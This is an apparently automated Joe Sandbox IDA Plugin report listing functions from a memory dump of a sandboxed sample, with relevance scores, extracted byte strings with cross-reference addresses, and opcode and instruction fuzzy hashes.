Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
API String ID: 0-202705158
Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction ID: 370fbb2ec9b9ad06f2add0e766769a48a75856b28240d87db9291abe31fb40d9
Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction Fuzzy Hash: 2D230933A16BC689DB789F35C8946FD73A0EB58784F914536CE0E0BBB4DE38A6418351

Function 00007FF7A09E6DF0 Relevance: 34.5, Strings: 27, Instructions: 769COMMON

Download Yara Rule

Strings

lZ(M, xrefs: 00007FF7A09E70D7
N9, xrefs: 00007FF7A09E7587
M9, xrefs: 00007FF7A09E7111
Wv4-, xrefs: 00007FF7A09EA8F0
kZ(M, xrefs: 00007FF7A09E6F72
Va, xrefs: 00007FF7A09E94D0
^', xrefs: 00007FF7A09EA44D
Kc, xrefs: 00007FF7A09EA606
#@+!, xrefs: 00007FF7A09E7020
Va, xrefs: 00007FF7A09E96A0
eSTl, xrefs: 00007FF7A09E9F7B
r, xrefs: 00007FF7A09E7B0C
$@+!, xrefs: 00007FF7A09E7041
r, xrefs: 00007FF7A09E7127
unordered_map/set too long, xrefs: 00007FF7A09EA96D
#cZ2, xrefs: 00007FF7A09E76F4
fqE, xrefs: 00007FF7A09E8D5E
#cZ2, xrefs: 00007FF7A09E7896
AlC(, xrefs: 00007FF7A09E9DBC
N9, xrefs: 00007FF7A09E79A7
9\4P, xrefs: 00007FF7A09E770A
lZ(M, xrefs: 00007FF7A09E7A65
^', xrefs: 00007FF7A09E9D26
fqE, xrefs: 00007FF7A09E9379
r, xrefs: 00007FF7A09E720F
9\4P, xrefs: 00007FF7A09E70E2
eqE, xrefs: 00007FF7A09E8D3D

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: r$r$r$ Kc$#@+!$#cZ2$#cZ2$$@+!$9\4P$9\4P$AlC($M9$N9$N9$Va$Va$Wv4-$eSTl$eqE$fqE$fqE$kZ(M$lZ(M$lZ(M$unordered_map/set too long$^'$^'
API String ID: 0-2172891005
Opcode ID: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
Instruction ID: 62db461f52a415a495fa6350bc3f4ba6c151ee403824b62386569487e97dc02a
Opcode Fuzzy Hash: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
Instruction Fuzzy Hash: BC72CC36A0E787C6EA749615A1C027EF690EB84794F614D32E94DC7BB8DE2CFC408752

Function 00007FF7A099C400 Relevance: 33.2, Strings: 25, Instructions: 1974COMMON

Download Yara Rule

Strings

P(A, xrefs: 00007FF7A099DA2F
Rw]0, xrefs: 00007FF7A099C864
Rw]0, xrefs: 00007FF7A099CD6E
o>;, xrefs: 00007FF7A099CFAC
l6", xrefs: 00007FF7A099D6F1
P(A, xrefs: 00007FF7A099D829
@Y7@, xrefs: 00007FF7A099C962
O(A, xrefs: 00007FF7A099C936
l6", xrefs: 00007FF7A099D344
q4, xrefs: 00007FF7A099D94F
o>;, xrefs: 00007FF7A099E0B1
%$Ip, xrefs: 00007FF7A099D17F
^z.5, xrefs: 00007FF7A099E52B
q4, xrefs: 00007FF7A099D212
@Y7@, xrefs: 00007FF7A099D981
tG%, xrefs: 00007FF7A099E47C
%$Ip, xrefs: 00007FF7A099D3A9
sG%, xrefs: 00007FF7A099C9D4
tG%, xrefs: 00007FF7A099C9DF
y, xrefs: 00007FF7A099D99E
l6", xrefs: 00007FF7A099EA68
y, xrefs: 00007FF7A099C7A6
tG%, xrefs: 00007FF7A099C80A
^z.5, xrefs: 00007FF7A099D8E0
Rw]0, xrefs: 00007FF7A099C9F5

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: q4$q4$%$Ip$%$Ip$@Y7@$@Y7@$O(A$P(A$P(A$Rw]0$Rw]0$Rw]0$^z.5$^z.5$sG%$tG%$tG%$tG%$l6"$l6"$l6"$o>;$o>;$y$y
API String ID: 0-3491445807
Opcode ID: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction ID: c731c296182ed124d42a98b66e163d2690716bead647be5e47e1c8b3931ad01a
Opcode Fuzzy Hash: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction Fuzzy Hash: 1813077260F6C286DA745618A4902BEE7D4EBD5780F950936F6CDC7BB4DE2CF4408B22

Function 00007FF7A09D6DE0 Relevance: 31.9, Strings: 24, Instructions: 1944COMMON

Download Yara Rule

Strings

!s(, xrefs: 00007FF7A09D889E
!s(, xrefs: 00007FF7A09D8C76
gO6`, xrefs: 00007FF7A09D7E60
3nzt, xrefs: 00007FF7A09D73F3
PN9, xrefs: 00007FF7A09D7BD6
3X, xrefs: 00007FF7A09D7165
B|9,, xrefs: 00007FF7A09D92AB
`@u, xrefs: 00007FF7A09D80B4
!s(, xrefs: 00007FF7A09D8C56
!s(, xrefs: 00007FF7A09D94B2
gO6`, xrefs: 00007FF7A09D85FC
B|9,, xrefs: 00007FF7A09D6ECD
B|9,, xrefs: 00007FF7A09D9438
!s(, xrefs: 00007FF7A09D82E9
ON9, xrefs: 00007FF7A09D71E1
!s(, xrefs: 00007FF7A09D88BE
/R{m, xrefs: 00007FF7A09D8CEE
!s(, xrefs: 00007FF7A09D79BE
PN9, xrefs: 00007FF7A09D87D0
3nzt, xrefs: 00007FF7A09D8074
`@u, xrefs: 00007FF7A09D9195
3X, xrefs: 00007FF7A09D89C7
/R{m, xrefs: 00007FF7A09D781D
B|9,, xrefs: 00007FF7A09D9433

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: !s($ !s($ !s($ !s($ !s($ !s($ !s($/R{m$/R{m$3nzt$3nzt$B|9,$B|9,$B|9,$B|9,$ON9$PN9$PN9$`@u$`@u$gO6`$gO6`$3X$3X
API String ID: 0-470075873
Opcode ID: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
Instruction ID: a2b1428d0e630afb6b932623b350da986fb6e5b76d2b32bd923f0a4f562b3e06
Opcode Fuzzy Hash: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
Instruction Fuzzy Hash: FC13DA26A4F28346FF746618908827EE791AB55310FA10D32E58DC77F5DE2CF8609B72

Function 00007FF7A09BD390 Relevance: 30.4, Strings: 23, Instructions: 1655COMMON

Download Yara Rule

Strings

QRd`, xrefs: 00007FF7A09BD5C1
;<b, xrefs: 00007FF7A09BD8D5
;#%, xrefs: 00007FF7A09BDB22
;#%, xrefs: 00007FF7A09BD684
Ar#X, xrefs: 00007FF7A09BDC76
<<b, xrefs: 00007FF7A09BD8E0
RRd`, xrefs: 00007FF7A09BEED9
RRd`, xrefs: 00007FF7A09BD5CC
s|x2, xrefs: 00007FF7A09BD502
<<b, xrefs: 00007FF7A09BDE44
"2ZB, xrefs: 00007FF7A09BDD23
@MC, xrefs: 00007FF7A09BDA19
;,y3, xrefs: 00007FF7A09BED6B
;,y3, xrefs: 00007FF7A09BD50D
AMC, xrefs: 00007FF7A09BEFDC
<<b, xrefs: 00007FF7A09BF13E
s|x2, xrefs: 00007FF7A09BF0E0
;,y3, xrefs: 00007FF7A09BD85C
AMC, xrefs: 00007FF7A09BDA24
@r#X, xrefs: 00007FF7A09BDC6B
<<b, xrefs: 00007FF7A09BDE49
Ar#X, xrefs: 00007FF7A09BD5F7
"2ZB, xrefs: 00007FF7A09BDF36

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
API String ID: 0-4187098220
Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction ID: 92ac00f54165dfc3ffe8f206b15d8fb9b1880780bd9e2127abe2f0627ee49e78
Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction Fuzzy Hash: 7DF2F836A1F68785EA749A58A09067EE3D1EB87364F910932D58DCB7F4DE3CF4408B21

Function 00007FF7A09C0740 Relevance: 27.1, Strings: 21, Instructions: 864COMMON

Download Yara Rule

Strings

"k5, xrefs: 00007FF7A09C100D
q\z, xrefs: 00007FF7A09C11C4
"k5, xrefs: 00007FF7A09C0E29
q\z, xrefs: 00007FF7A09C0BE5
"k5, xrefs: 00007FF7A09C17BB
V}M, xrefs: 00007FF7A09C0CDC
GSM-, xrefs: 00007FF7A09C07C2
V}M, xrefs: 00007FF7A09C0D04
}k+, xrefs: 00007FF7A09C084C
~0%), xrefs: 00007FF7A09C0C60
q\z, xrefs: 00007FF7A09C1544
"k5, xrefs: 00007FF7A09C0E24
|k+, xrefs: 00007FF7A09C0841
}k+, xrefs: 00007FF7A09C0D9B
HSM-, xrefs: 00007FF7A09C0CA9
HSM-, xrefs: 00007FF7A09C0DE6
!k5, xrefs: 00007FF7A09C07CD
V}M, xrefs: 00007FF7A09C0C1F
q\z, xrefs: 00007FF7A09C11CE
~0%), xrefs: 00007FF7A09C1834
q\z, xrefs: 00007FF7A09C0BDA

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
API String ID: 0-2622637242
Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction ID: 413441d389be90e65e6e39f5a35de9dc415aa941ae9236156f2eec4145212ab7
Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction Fuzzy Hash: B0821C36E0E78389EA789B15948427EE391EB85750F914932E68DC37F4DE2CF8408F95

Function 00007FF7A09964A0 Relevance: 26.3, Strings: 19, Instructions: 2521COMMON

Download Yara Rule

Strings

A{9s, xrefs: 00007FF7A09987B7
x"a, xrefs: 00007FF7A099946D
w"a, xrefs: 00007FF7A0996F14
A{9s, xrefs: 00007FF7A0997269
a[, xrefs: 00007FF7A0997569
6;ti, xrefs: 00007FF7A09976AC
x"a, xrefs: 00007FF7A09984A5
a[, xrefs: 00007FF7A09975AD
iyku, xrefs: 00007FF7A0996708
VFL(, xrefs: 00007FF7A09977B9
A{9s, xrefs: 00007FF7A09987A2
jyku, xrefs: 00007FF7A0997854
VFL(, xrefs: 00007FF7A09968C7
Cs6, xrefs: 00007FF7A099820E
Cs6, xrefs: 00007FF7A0997888
jyku, xrefs: 00007FF7A0997DB4
a[, xrefs: 00007FF7A09975A8
A{9s, xrefs: 00007FF7A0997C93
@{9s, xrefs: 00007FF7A0996720

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
API String ID: 0-3286678768
Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction ID: d57d2ac756d93174c6045ee25684d116503b552c97e501af36547f8c26dd0ce5
Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction Fuzzy Hash: A2330A35A0E78386EE795614909027EE395EB947D0F92053AFA9E43BB8DE2CF440D712

Function 00007FF7A09F2010 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 618COMMON

Download Yara Rule

Strings

.NP, xrefs: 00007FF7A09F2151
'fj&, xrefs: 00007FF7A09F2082
.NP, xrefs: 00007FF7A09F29D3
gqYG, xrefs: 00007FF7A09F2419
(fj&, xrefs: 00007FF7A09F2478
(fj&, xrefs: 00007FF7A09F2836
.NP, xrefs: 00007FF7A09F213B
gqYG, xrefs: 00007FF7A09F2844
gqYG, xrefs: 00007FF7A09F28B9

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 'fj&$(fj&$(fj&$gqYG$gqYG$gqYG$.NP$.NP$.NP
API String ID: 0-4046524389
Opcode ID: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
Instruction ID: a2aaae669ad8507fbd6987d41ea015768306e97e9ec3950599df751e382d1929
Opcode Fuzzy Hash: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
Instruction Fuzzy Hash: 8842FB33E0A6438EFB64AB79849037D6791AB04358FA50A36E91DC77B4CE2CF840C765

Function 00007FF7A09F5B80 Relevance: 20.9, Strings: 15, Instructions: 2162COMMON

Download Yara Rule

Strings

9sJZ, xrefs: 00007FF7A09F7723
>(q, xrefs: 00007FF7A09F6873
Ap1, xrefs: 00007FF7A09F6C42
{bC, xrefs: 00007FF7A09F5DA0
/, xrefs: 00007FF7A09F5E76
|bC, xrefs: 00007FF7A09F6406
>(q, xrefs: 00007FF7A09F6D4D
/, xrefs: 00007FF7A09F612F
|bC, xrefs: 00007FF7A09F65DC
h,], xrefs: 00007FF7A09F772E
9sJZ, xrefs: 00007FF7A09F6F11
>(q, xrefs: 00007FF7A09F686E
h,], xrefs: 00007FF7A09F7BCD
Ap1, xrefs: 00007FF7A09F5DD0
>(q, xrefs: 00007FF7A09F5E6A

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
API String ID: 0-1954784225
Opcode ID: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction ID: 926f0ba56adbdf8d8a66d1a6ba0672ba843d4a23da1317bf6a3df76245a31ff6
Opcode Fuzzy Hash: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction Fuzzy Hash: ED23EB37A0E7878AEAB45614E09037EE691EB94350FE5493AD78D87BB4CE3CF4408761

Function 00007FF7A09E8C10 Relevance: 19.4, Strings: 15, Instructions: 662COMMON

Download Yara Rule

Strings

Wv4-, xrefs: 00007FF7A09E93D4
6AC>, xrefs: 00007FF7A09EA216
@lC(, xrefs: 00007FF7A09E8EA1
Vv4-, xrefs: 00007FF7A09E8E96
Kc, xrefs: 00007FF7A09E9695
y+o, xrefs: 00007FF7A09EA138
AlC(, xrefs: 00007FF7A09E9856
eSTl, xrefs: 00007FF7A09E91EF
6AC>, xrefs: 00007FF7A09E90E7
y+o, xrefs: 00007FF7A09E8F14
Va, xrefs: 00007FF7A09EA263
dSTl, xrefs: 00007FF7A09E91D9
eBal, xrefs: 00007FF7A09E91FA
eqE, xrefs: 00007FF7A09E8D3D
eBal, xrefs: 00007FF7A09E934E

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: Kc$6AC>$6AC>$@lC($AlC($Vv4-$Va$Wv4-$dSTl$eBal$eBal$eSTl$eqE$y+o$y+o
API String ID: 0-1434796071
Opcode ID: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
Instruction ID: 8524e594f8750ffc3208c11a118a72c591f298665343c02a25afc6ae87f5daec
Opcode Fuzzy Hash: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
Instruction Fuzzy Hash: DE529A36A0E7CBC6DA749A55A49027FA390E799740F514936D98DC77F4CE2CFC808B12

Function 00007FF7A09B3AD0 Relevance: 18.5, Strings: 14, Instructions: 993COMMON

Download Yara Rule

Strings

t?^, xrefs: 00007FF7A09B4BCE
1Uj, xrefs: 00007FF7A09B3FEA
\f', xrefs: 00007FF7A09B3C40
]_v, xrefs: 00007FF7A09B4A32
0s, xrefs: 00007FF7A09B3D5F
\f', xrefs: 00007FF7A09B460F
]_v, xrefs: 00007FF7A09B41BD
0s, xrefs: 00007FF7A09B3D6B
1Uj, xrefs: 00007FF7A09B4D95
]_v, xrefs: 00007FF7A09B41D2
0s, xrefs: 00007FF7A09B40D5
t?^, xrefs: 00007FF7A09B44F0
]_v, xrefs: 00007FF7A09B3CBE
[f', xrefs: 00007FF7A09B3C28

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ]_v$]_v$]_v$]_v$[f'$\f'$\f'$t?^$t?^$0s$0s$0s$1Uj$1Uj
API String ID: 0-4198073719
Opcode ID: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction ID: 3765b9bb08cda6b1165d6449b059a79865eba383664c0f9f9ad5b8f176ec2162
Opcode Fuzzy Hash: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction Fuzzy Hash: 1D927C32B0F15386EA78D61854A067EE290DF52770F91463AE65E87FF8C93CF8409B51

Function 00007FF7A09BB6A0 Relevance: 17.5, Strings: 13, Instructions: 1290COMMON

Download Yara Rule

Strings

?c, xrefs: 00007FF7A09BBF84
b<i, xrefs: 00007FF7A09BC2CA
PF&+, xrefs: 00007FF7A09BC12B
WKn', xrefs: 00007FF7A09BBA24
*q, xrefs: 00007FF7A09BBF06
b<i, xrefs: 00007FF7A09BC9C9
)q, xrefs: 00007FF7A09BB980
*q, xrefs: 00007FF7A09BBF6E
XKn', xrefs: 00007FF7A09BC115
PF&+, xrefs: 00007FF7A09BCF5F
?c, xrefs: 00007FF7A09BBF39
a<i, xrefs: 00007FF7A09BB911
XKn', xrefs: 00007FF7A09BC681

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
API String ID: 0-253853581
Opcode ID: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction ID: a23888a2631385a4e64a239a689210ee0a712d1c42e6f048554cc60166578bb0
Opcode Fuzzy Hash: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction Fuzzy Hash: 21C2F972F0B6878EEB749E2888813FD6294EB1A764F514D36DA0DCB7E4CE68F5408311

Function 00007FF7A09D04D0 Relevance: 17.1, Strings: 13, Instructions: 835COMMON

Download Yara Rule

Strings

4u`m, xrefs: 00007FF7A09D1209
1we, xrefs: 00007FF7A09D1313
4u`m, xrefs: 00007FF7A09D0DF5
1we, xrefs: 00007FF7A09D130E
4u`m, xrefs: 00007FF7A09D095A
3u`m, xrefs: 00007FF7A09D069B
0we, xrefs: 00007FF7A09D0582
1we, xrefs: 00007FF7A09D06E7
4u`m, xrefs: 00007FF7A09D1204
kxgK, xrefs: 00007FF7A09D117C
QMea, xrefs: 00007FF7A09D0D87
kxgK, xrefs: 00007FF7A09D0E0A
QMea, xrefs: 00007FF7A09D1495

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 0we$1we$1we$1we$3u`m$4u`m$4u`m$4u`m$4u`m$QMea$QMea$kxgK$kxgK
API String ID: 0-554904181
Opcode ID: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction ID: fdad62da252a2771186578d4fe586075ef3e71a770f3b0ceccabc61f09fbbaf5
Opcode Fuzzy Hash: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction Fuzzy Hash: C372FA26E5F683C5EA749719B08837EE290ABD4790FA11D32EA4DC77B4DE2CF4409B11

Function 00007FF7A09ABAB0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON

Download Yara Rule

Strings

Tm]., xrefs: 00007FF7A09ACADD
Z, xrefs: 00007FF7A09AC506
vector too long, xrefs: 00007FF7A09ABAB4
C\!N, xrefs: 00007FF7A09AC22D
zXF, xrefs: 00007FF7A09ABC17
yXF, xrefs: 00007FF7A09ABBEB
Z, xrefs: 00007FF7A09AC889
zXF, xrefs: 00007FF7A09ACF0E
C\!N, xrefs: 00007FF7A09ACE8A
Z]N, xrefs: 00007FF7A09ACC3D
Tm]., xrefs: 00007FF7A09AC343
Z]N, xrefs: 00007FF7A09AC12F

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: C\!N$C\!N$Tm].$Tm].$Z]N$Z]N$Z$Z$vector too long$yXF$zXF$zXF
API String ID: 0-2263072351
Opcode ID: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction ID: 4aaa83719938515287a2b301c4374f24cf926dc253dd735336d48e1442ca3bbf
Opcode Fuzzy Hash: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction Fuzzy Hash: 0DA22C76A0E28787DA749718909177EF290EB84344FE14936E5CDC77B9CE2CF8528B21

Function 00007FF7A09D43B0 Relevance: 16.0, Strings: 12, Instructions: 1036COMMON

Download Yara Rule

Strings

)m, xrefs: 00007FF7A09D4D4D
)m, xrefs: 00007FF7A09D44DD
t", xrefs: 00007FF7A09D4B7A
r2'a, xrefs: 00007FF7A09D4593
p2, xrefs: 00007FF7A09D47E3
ISB, xrefs: 00007FF7A09D546C
s", xrefs: 00007FF7A09D44C0
ISB, xrefs: 00007FF7A09D4D38
)m, xrefs: 00007FF7A09D4C69
r2'a, xrefs: 00007FF7A09D5774
t", xrefs: 00007FF7A09D4DDB
p2, xrefs: 00007FF7A09D54FA

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: r2'a$r2'a$s"$t"$t"$ISB$ISB$p2$p2$)m$)m$)m
API String ID: 0-611830788
Opcode ID: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
Instruction ID: 2a23da52d13c5d5b3cd5ef84eeb50e84f2dfc2f715074f1a80b736d09be54b3b
Opcode Fuzzy Hash: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
